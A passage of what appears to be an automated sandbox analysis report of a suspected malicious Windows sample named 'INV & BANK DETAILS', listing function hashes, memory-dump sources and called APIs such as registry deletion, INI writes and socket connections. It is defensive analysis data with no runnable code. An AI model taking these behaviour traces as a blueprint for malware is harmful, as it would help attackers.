                                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                APIs
                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                • Sleep.KERNEL32(0000000A), ref: 0047D455
                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Interlocked$DecrementIncrement$Sleep
                                • String ID:
                                • API String ID: 327565842-0
                                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                APIs
                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: PrivateProfile$SectionWrite$String
                                • String ID:
                                • API String ID: 2832842796-0
                                • Opcode ID: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                • Opcode Fuzzy Hash: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                APIs
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Enum$CloseDeleteOpen
                                • String ID:
                                • API String ID: 2095303065-0
                                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: RectWindow
                                • String ID:
                                • API String ID: 861336768-0
                                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                APIs
                                • SendMessageW.USER32 ref: 00449598
                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                • _wcslen.LIBCMT ref: 0044960D
                                • _wcslen.LIBCMT ref: 0044961A
                                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$_wcslen$_wcspbrk
                                • String ID:
                                • API String ID: 1856069659-0
                                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                APIs
                                • GetCursorPos.USER32(?), ref: 004478E2
                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                • GetCursorPos.USER32(00000000), ref: 0044796A
                                • TrackPopupMenuEx.USER32(00A363A0,00000000,00000000,?,?,00000000), ref: 00447991
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CursorMenuPopupTrack$Proc
                                • String ID:
                                • API String ID: 1300944170-0
                                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                APIs
                                • GetClientRect.USER32(?,?), ref: 004479CC
                                • GetCursorPos.USER32(?), ref: 004479D7
                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                • String ID:
                                • API String ID: 1822080540-0
                                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                • EndPaint.USER32(?,?), ref: 00447D13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                • String ID:
                                • API String ID: 659298297-0
                                • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                APIs
                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                  • Part of subcall function 00440D98: SendMessageW.USER32(00A31B28,000000F1,00000000,00000000), ref: 00440E6E
                                  • Part of subcall function 00440D98: SendMessageW.USER32(00A31B28,000000F1,00000001,00000000), ref: 00440E9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$EnableMessageSend$LongShow
                                • String ID:
                                • API String ID: 142311417-0
                                • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00445879
                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                • _wcslen.LIBCMT ref: 004458FB
                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                • String ID:
                                • API String ID: 3087257052-0
                                • Opcode ID: 58b2d0fc0d887814ae1f78bb314e2e1363a4a0487ede693bc12998591e17cbfb
                                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                • Opcode Fuzzy Hash: 58b2d0fc0d887814ae1f78bb314e2e1363a4a0487ede693bc12998591e17cbfb
                                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                APIs
                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                • String ID:
                                • API String ID: 245547762-0
                                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                • BeginPath.GDI32(?), ref: 0044723D
                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Object$Select$BeginCreateDeletePath
                                • String ID:
                                • API String ID: 2338827641-0
                                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                APIs
                                • Sleep.KERNEL32(00000000), ref: 00434598
                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CounterPerformanceQuerySleep
                                • String ID:
                                • API String ID: 2875609808-0
                                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                • MessageBeep.USER32(00000000), ref: 00460C46
                                • KillTimer.USER32(?,0000040A), ref: 00460C68
                                • EndDialog.USER32(?,00000001), ref: 00460C83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                • String ID:
                                • API String ID: 3741023627-0
                                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
